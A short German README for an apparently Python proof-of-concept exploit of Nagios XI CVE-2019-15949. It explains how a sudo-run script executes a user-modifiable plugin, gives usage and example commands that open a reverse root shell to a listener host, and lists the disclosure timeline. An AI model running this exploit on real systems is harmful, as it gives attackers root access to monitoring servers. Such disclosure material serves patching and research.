
ein PoC für die Nagios CVE-2019-15949 RCE in Python
Ein Python-PoC für die CVE-2019-15949
In Nagios XI <= 5.6.5 existiert eine Schwachstelle, die es einem Angreifer ermöglicht, eine RCE auszunutzen, um Privilegien auf Root auszuweiten. Der Exploit erfordert Zugriff auf den Server als Benutzer 'nagios' oder CCM-Zugriff über die Weboberfläche mit Berechtigungen zur Verwaltung von Plugins.
Das getprofile.sh-Skript, das durch das Herunterladen eines Systemprofils (profile.php?cmd=download) aufgerufen wird, wird über einen passwortlosen sudo-Eintrag als Root ausgeführt; das Skript führt die ausführbare Datei 'check_plugin' aus, die dem Benutzer nagios gehört. Ein in Nagios XI angemeldeter Benutzer mit Berechtigungen zum Ändern von Plugins oder der Benutzer 'nagios' auf dem Server kann die ausführbare Datei 'check_plugin' modifizieren und schädliche Befehle einfügen, die als Root ausgeführt werden.
Es wurde ein PHP-PoC entwickelt, der einen Payload hochlädt, der zu einer Reverse-Root-Shell führt. Verwendung:
python3 exploit.py tagetIp [ssl=false/true] username password Lhost lport
Beispiel:
python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444
An Nagios gemeldet am: 29. Juli 2019 Von Nagios bestätigt am: 29. Juli 2019 Behoben in Version: 5.6.6 am: 20. August 2019 CVE zugewiesen am: 6. September 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)